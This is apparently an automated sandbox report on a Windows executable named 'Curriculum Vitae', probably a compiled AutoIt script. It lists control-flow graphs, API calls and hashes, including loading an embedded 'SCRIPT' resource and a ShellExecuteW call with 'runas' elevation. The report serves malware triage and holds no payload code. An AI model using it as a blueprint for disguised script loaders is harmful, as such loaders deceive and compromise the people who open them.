                      control_flow_graph 234 d342de-d3434d call d3a961 GetVersionExW call d36b57 239 d73617-d7362a 234->239 240 d34353 234->240 241 d7362b-d7362f 239->241 242 d34355-d34357 240->242 243 d73632-d7363e 241->243 244 d73631 241->244 245 d73656 242->245 246 d3435d-d343bc call d393b2 call d337a0 242->246 243->241 247 d73640-d73642 243->247 244->243 250 d7365d-d73660 245->250 263 d343c2-d343c4 246->263 264 d737df-d737e6 246->264 247->242 249 d73648-d7364f 247->249 249->239 252 d73651 249->252 253 d73666-d736a8 250->253 254 d3441b-d34435 GetCurrentProcess IsWow64Process 250->254 252->245 253->254 258 d736ae-d736b1 253->258 256 d34437 254->256 257 d34494-d3449a 254->257 260 d3443d-d34449 256->260 257->260 261 d736b3-d736bd 258->261 262 d736db-d736e5 258->262 269 d73824-d73828 GetSystemInfo 260->269 270 d3444f-d3445e LoadLibraryA 260->270 271 d736bf-d736c5 261->271 272 d736ca-d736d6 261->272 265 d736e7-d736f3 262->265 266 d736f8-d73702 262->266 263->250 273 d343ca-d343dd 263->273 267 d73806-d73809 264->267 268 d737e8 264->268 265->254 277 d73715-d73721 266->277 278 d73704-d73710 266->278 279 d737f4-d737fc 267->279 280 d7380b-d7381a 267->280 276 d737ee 268->276 281 d34460-d3446e GetProcAddress 270->281 282 d3449c-d344a6 GetSystemInfo 270->282 271->254 272->254 274 d343e3-d343e5 273->274 275 d73726-d7372f 273->275 283 d343eb-d343ee 274->283 284 d7374d-d73762 274->284 285 d73731-d73737 275->285 286 d7373c-d73748 275->286 276->279 277->254 278->254 279->267 280->276 287 d7381c-d73822 280->287 281->282 288 d34470-d34474 GetNativeSystemInfo 281->288 289 d34476-d34478 282->289 290 d73791-d73794 283->290 291 d343f4-d3440f 283->291 292 d73764-d7376a 284->292 293 d7376f-d7377b 284->293 285->254 286->254 287->279 288->289 294 d34481-d34493 289->294 295 d3447a-d3447b FreeLibrary 289->295 290->254 298 d7379a-d737c1 290->298 296 d34415 291->296 297 d73780-d7378c 291->297 292->254 293->254 295->294 296->254 297->254 299 d737c3-d737c9 298->299 300 d737ce-d737da 298->300 299->254 300->254
                      APIs
                      • GetVersionExW.KERNEL32(?), ref: 00D3430D
                        • Part of subcall function 00D36B57: _wcslen.LIBCMT ref: 00D36B6A
                      • GetCurrentProcess.KERNEL32(?,00DCCB64,00000000,?,?), ref: 00D34422
                      • IsWow64Process.KERNEL32(00000000,?,?), ref: 00D34429
                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00D34454
                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00D34466
                      • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00D34474
                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 00D3447B
                      • GetSystemInfo.KERNEL32(?,?,?), ref: 00D344A0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                      • String ID: GetNativeSystemInfo$kernel32.dll$|O
                      • API String ID: 3290436268-3101561225
                      • Opcode ID: 36e9009ea7e07989d582247ea3f98ea8927866f4c65311ba18cce6d8d2359640
                      • Instruction ID: 53945b67d79bf1741ff8b6678843a41626977139e01d551da6eb102a918a32fa
                      • Opcode Fuzzy Hash: 36e9009ea7e07989d582247ea3f98ea8927866f4c65311ba18cce6d8d2359640
                      • Instruction Fuzzy Hash: D7A1C66191A3C0DFC715C76B7C815997FE46B26300F0A94F9E085BBA22D27E558CDB31
                      Function 00D342A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1378 d342a2-d342ba CreateStreamOnHGlobal 1379 d342da-d342dd 1378->1379 1380 d342bc-d342d3 FindResourceExW 1378->1380 1381 d342d9 1380->1381 1382 d735ba-d735c9 LoadResource 1380->1382 1381->1379 1382->1381 1383 d735cf-d735dd SizeofResource 1382->1383 1383->1381 1384 d735e3-d735ee LockResource 1383->1384 1384->1381 1385 d735f4-d735fc 1384->1385 1386 d73600-d73612 1385->1386 1386->1381
                      APIs
                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00D350AA,?,?,00000000,00000000), ref: 00D342B2
                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00D350AA,?,?,00000000,00000000), ref: 00D342C9
                      • LoadResource.KERNEL32(?,00000000,?,?,00D350AA,?,?,00000000,00000000,?,?,?,?,?,?,00D34F20), ref: 00D735BE
                      • SizeofResource.KERNEL32(?,00000000,?,?,00D350AA,?,?,00000000,00000000,?,?,?,?,?,?,00D34F20), ref: 00D735D3
                      • LockResource.KERNEL32(00D350AA,?,?,00D350AA,?,?,00000000,00000000,?,?,?,?,?,?,00D34F20,?), ref: 00D735E6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                      • String ID: SCRIPT
                      • API String ID: 3051347437-3967369404
                      • Opcode ID: 8ca7e480cf30bc672337078f3eb168acdccc2441968e0b4cd54e0417446a726b
                      • Instruction ID: 33e74c71e43a359d1e791be4600a6d8bb9d1b406b0612bf7b1797becc1709626
                      • Opcode Fuzzy Hash: 8ca7e480cf30bc672337078f3eb168acdccc2441968e0b4cd54e0417446a726b
                      • Instruction Fuzzy Hash: CE117C74202702BFD7218BA6DC48F27BBBDEBC6B51F188169F516DA650DB71EC008A34
                      Function 00D72BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00D32B6B
                        • Part of subcall function 00D33A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00E01418,?,00D32E7F,?,?,?,00000000), ref: 00D33A78
                        • Part of subcall function 00D39CB3: _wcslen.LIBCMT ref: 00D39CBD
                      • GetForegroundWindow.USER32(runas,?,?,?,?,?,00DF2224), ref: 00D72C10
                      • ShellExecuteW.SHELL32(00000000,?,?,00DF2224), ref: 00D72C17
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                      • String ID: runas
                      • API String ID: 448630720-4000483414
                      • Opcode ID: 4739aa6dfea50b4eda45e7dbce84148f243213e6e98f4ad197e3038eeb01558b
                      • Instruction ID: eef3bf791446222634fea5de7e0494bbc6c80e19b4793f425358f837ece57725
                      • Opcode Fuzzy Hash: 4739aa6dfea50b4eda45e7dbce84148f243213e6e98f4ad197e3038eeb01558b
                      • Instruction Fuzzy Hash: 041126316083466EC708FF64E892DBEB7A4DFD0300F48642CF286560A2DF718A49C732
                      Function 00D9DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrlenW.KERNEL32(?,00D75222), ref: 00D9DBCE
                      • GetFileAttributesW.KERNELBASE(?), ref: 00D9DBDD
                      • FindFirstFileW.KERNELBASE(?,?), ref: 00D9DBEE
                      • FindClose.KERNEL32(00000000), ref: 00D9DBFA
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: FileFind$AttributesCloseFirstlstrlen
                      • String ID:
                      • API String ID: 2695905019-0
                      • Opcode ID: 2d10df61404a79ac074558d35c76b94b595ca74e5cb5abf32f7d6dad0d4febb5
                      • Instruction ID: 579ac297e6fdf8ec074170ee37dce227fea5a234d25899cb9efad89f6b57d72d
                      • Opcode Fuzzy Hash: 2d10df61404a79ac074558d35c76b94b595ca74e5cb5abf32f7d6dad0d4febb5
                      • Instruction Fuzzy Hash: 3AF0A030820A12578B206B78EC0D8AAB77D9E05334B184702F97AC22E0EBB0995586B9
                      Function 00D3CAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID:
                      • String ID: Variable is not of type 'Object'.$p#
                      • API String ID: 0-1086706999
                      • Opcode ID: dbd0ea02d0123b670a6dd03f58f0c8ef4b863f1ddbfb8e47898e50ee633b2e16
                      • Instruction ID: c44f38e3c981f614eb2717ad17b32f661f91eb8efba7e4f6d600e1856e117875
                      • Opcode Fuzzy Hash: dbd0ea02d0123b670a6dd03f58f0c8ef4b863f1ddbfb8e47898e50ee633b2e16
                      • Instruction Fuzzy Hash: 7F328A74910218DBCF14EF94D885AEDBBB5FF04304F189069E846BB292DB75AE49CB70
                      Function 00D3BF40 Relevance: 2.4, Strings: 1, Instructions: 1178COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: BuffCharUpper
                      • String ID: p#
                      • API String ID: 3964851224-4182048217
                      • Opcode ID: 546b8a15db8ee940f065b69cd3500cb0169012d52aca6f3634fde0c62fee452c
                      • Instruction ID: 40c71f6e9faa295261a20b52bfa8316e79b422cf99ae20c85c9dc9d1e76da3e9
                      • Opcode Fuzzy Hash: 546b8a15db8ee940f065b69cd3500cb0169012d52aca6f3634fde0c62fee452c
                      • Instruction Fuzzy Hash: 02A248746183418FC754DF18C480B2ABBE1FF89304F18996DE99A9B362D771EC45CBA2
                      Function 00D3D730 Relevance: 21.6, APIs: 14, Instructions: 631windowsleeptimeCOMMON
                      Download Yara Rule
                      APIs
                      • GetInputState.USER32 ref: 00D3D807
                      • timeGetTime.WINMM ref: 00D3DA07
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D3DB28
                      • TranslateMessage.USER32(?), ref: 00D3DB7B
                      • DispatchMessageW.USER32(?), ref: 00D3DB89
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D3DB9F
                      • Sleep.KERNEL32(0000000A), ref: 00D3DBB1
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                      • String ID:
                      • API String ID: 2189390790-0
                      • Opcode ID: ec8fd4a6dbd10a58e83287fd99262ba03fa992df06cefc01478b5c39d662e833
                      • Instruction ID: d4331190e1ba8333f4cf1e8399348496c2d106420f2375fc8b705901c4083a95
                      • Opcode Fuzzy Hash: ec8fd4a6dbd10a58e83287fd99262ba03fa992df06cefc01478b5c39d662e833
                      • Instruction Fuzzy Hash: 3842CE70604342EFD728DF24D884BBAB7A6FF45304F188559E596872A1D771E888CFB2
                      Function 00D32CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • GetSysColorBrush.USER32(0000000F), ref: 00D32D07
                      • RegisterClassExW.USER32(00000030), ref: 00D32D31
                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D32D42
                      • InitCommonControlsEx.COMCTL32(?), ref: 00D32D5F
                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D32D6F
                      • LoadIconW.USER32(000000A9), ref: 00D32D85
                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D32D94
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                      • API String ID: 2914291525-1005189915
                      • Opcode ID: 7d7e3b3aa30a5c0cbddeb4014c7b23af48a6724d7282c119c9d626d1ad4f1c71
                      • Instruction ID: 264de619fda7411df527050accb456bdef1b831b0815ce11c4ae558b122f3d8c
                      • Opcode Fuzzy Hash: 7d7e3b3aa30a5c0cbddeb4014c7b23af48a6724d7282c119c9d626d1ad4f1c71
                      • Instruction Fuzzy Hash: A821E2B1D1130AAFDB00DFA5E849B9DBBB4FB08700F10515AF615FA2A0D7B605888FA0
                      Function 00D7065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 302 d7065b-d7068b call d7042f 305 d706a6-d706b2 call d65221 302->305 306 d7068d-d70698 call d5f2c6 302->306 312 d706b4-d706c9 call d5f2c6 call d5f2d9 305->312 313 d706cb-d70714 call d7039a 305->313 311 d7069a-d706a1 call d5f2d9 306->311 322 d7097d-d70983 311->322 312->311 320 d70716-d7071f 313->320 321 d70781-d7078a GetFileType 313->321 325 d70756-d7077c GetLastError call d5f2a3 320->325 326 d70721-d70725 320->326 327 d707d3-d707d6 321->327 328 d7078c-d707bd GetLastError call d5f2a3 CloseHandle 321->328 325->311 326->325 331 d70727-d70754 call d7039a 326->331 329 d707df-d707e5 327->329 330 d707d8-d707dd 327->330 328->311 339 d707c3-d707ce call d5f2d9 328->339 334 d707e9-d70837 call d6516a 329->334 335 d707e7 329->335 330->334 331->321 331->325 345 d70847-d7086b call d7014d 334->345 346 d70839-d70845 call d705ab 334->346 335->334 339->311 351 d7087e-d708c1 345->351 352 d7086d 345->352 346->345 353 d7086f-d70879 call d686ae 346->353 355 d708c3-d708c7 351->355 356 d708e2-d708f0 351->356 352->353 353->322 355->356 358 d708c9-d708dd 355->358 359 d708f6-d708fa 356->359 360 d7097b 356->360 358->356 359->360 361 d708fc-d7092f CloseHandle call d7039a 359->361 360->322 364 d70963-d70977 361->364 365 d70931-d7095d GetLastError call d5f2a3 call d65333 361->365 364->360 365->364
                      APIs
                        • Part of subcall function 00D7039A: CreateFileW.KERNELBASE(00000000,00000000,?,00D70704,?,?,00000000,?,00D70704,00000000,0000000C), ref: 00D703B7
                      • GetLastError.KERNEL32 ref: 00D7076F
                      • __dosmaperr.LIBCMT ref: 00D70776
                      • GetFileType.KERNELBASE(00000000), ref: 00D70782
                      • GetLastError.KERNEL32 ref: 00D7078C
                      • __dosmaperr.LIBCMT ref: 00D70795
                      • CloseHandle.KERNEL32(00000000), ref: 00D707B5
                      • CloseHandle.KERNEL32(?), ref: 00D708FF
                      • GetLastError.KERNEL32 ref: 00D70931
                      • __dosmaperr.LIBCMT ref: 00D70938
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                      • String ID: H
                      • API String ID: 4237864984-2852464175
                      • Opcode ID: 420697560b515d995d6eb0e536851a07fd6f0bddb2e36abf0782d8f8ee803e56
                      • Instruction ID: e2aed2daf01b4ade595c3d89c46e406b091ad337e6d77f8b358956bd03c1b6b0
                      • Opcode Fuzzy Hash: 420697560b515d995d6eb0e536851a07fd6f0bddb2e36abf0782d8f8ee803e56
                      • Instruction Fuzzy Hash: 3DA10532A101458FDF19AF68D851BAD3FA0EB06320F18815DF859EB3D1EB319856CBB1
                      Function 00D3344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                        • Part of subcall function 00D33A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00E01418,?,00D32E7F,?,?,?,00000000), ref: 00D33A78
                        • Part of subcall function 00D33357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00D33379
                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00D3356A
                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00D7318D
                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00D731CE
                      • RegCloseKey.ADVAPI32(?), ref: 00D73210
                      • _wcslen.LIBCMT ref: 00D73277
                      • _wcslen.LIBCMT ref: 00D73286
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                      • API String ID: 98802146-2727554177
                      • Opcode ID: d3e1801a8be7ec8a7d3f0749d5dc5acdd9b8f18d06295ce9bd9d31e8f713896c
                      • Instruction ID: 566a2ec258d99a95cacb3c5fba53359af14c2fb564ecd680ac05c978405c0395
                      • Opcode Fuzzy Hash: d3e1801a8be7ec8a7d3f0749d5dc5acdd9b8f18d06295ce9bd9d31e8f713896c
                      • Instruction Fuzzy Hash: 397191714043029EC314EF66DC8695BB7E8FF94340F44542EF689A31A1EB799A88CB72
                      Function 00D32B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • GetSysColorBrush.USER32(0000000F), ref: 00D32B8E
                      • LoadCursorW.USER32(00000000,00007F00), ref: 00D32B9D
                      • LoadIconW.USER32(00000063), ref: 00D32BB3
                      • LoadIconW.USER32(000000A4), ref: 00D32BC5
                      • LoadIconW.USER32(000000A2), ref: 00D32BD7
                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00D32BEF
                      • RegisterClassExW.USER32(?), ref: 00D32C40
                        • Part of subcall function 00D32CD4: GetSysColorBrush.USER32(0000000F), ref: 00D32D07
                        • Part of subcall function 00D32CD4: RegisterClassExW.USER32(00000030), ref: 00D32D31
                        • Part of subcall function 00D32CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D32D42
                        • Part of subcall function 00D32CD4: InitCommonControlsEx.COMCTL32(?), ref: 00D32D5F
                        • Part of subcall function 00D32CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D32D6F
                        • Part of subcall function 00D32CD4: LoadIconW.USER32(000000A9), ref: 00D32D85
                        • Part of subcall function 00D32CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D32D94
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                      • String ID: #$0$AutoIt v3
                      • API String ID: 423443420-4155596026
                      • Opcode ID: c400ed7174fab342a53158637c63b21ab90278d79d21e2dcabc7e2300fedd1e1
                      • Instruction ID: 5c3bf32de96a820edd8e44b3b4d5a7d3173e1f41b4912bdc1f6fbaabd0be4c82
                      • Opcode Fuzzy Hash: c400ed7174fab342a53158637c63b21ab90278d79d21e2dcabc7e2300fedd1e1
                      • Instruction Fuzzy Hash: 90212A70E10315AFDB109F96EC45BA97FB4FB08B50F15009AE604BA7A0D7BA05848F90
                      Function 00D3B710 Relevance: 16.3, APIs: 1, Strings: 8, Instructions: 587COMMON
                      Download Yara Rule
                      APIs
                      • __Init_thread_footer.LIBCMT ref: 00D3BB4E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Init_thread_footer
                      • String ID: p#$p#$p#$p#$p%$p%$x#$x#
                      • API String ID: 1385522511-4136154834
                      • Opcode ID: e61c622b9777b5d7fa62a2736195a838c29c6b496bc5d6827e87cfa422f7c705
                      • Instruction ID: 38d90a93ea3e3735121d80d5c0c7fd8ee09ab294e4225b148f0d16bb4bd2337c
                      • Opcode Fuzzy Hash: e61c622b9777b5d7fa62a2736195a838c29c6b496bc5d6827e87cfa422f7c705
                      • Instruction Fuzzy Hash: DE32CF74A00209DFDB24DF54C898BBEBBB5EF44320F18805AEA45AB251C775ED85CBB1
                      Function 00D33170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
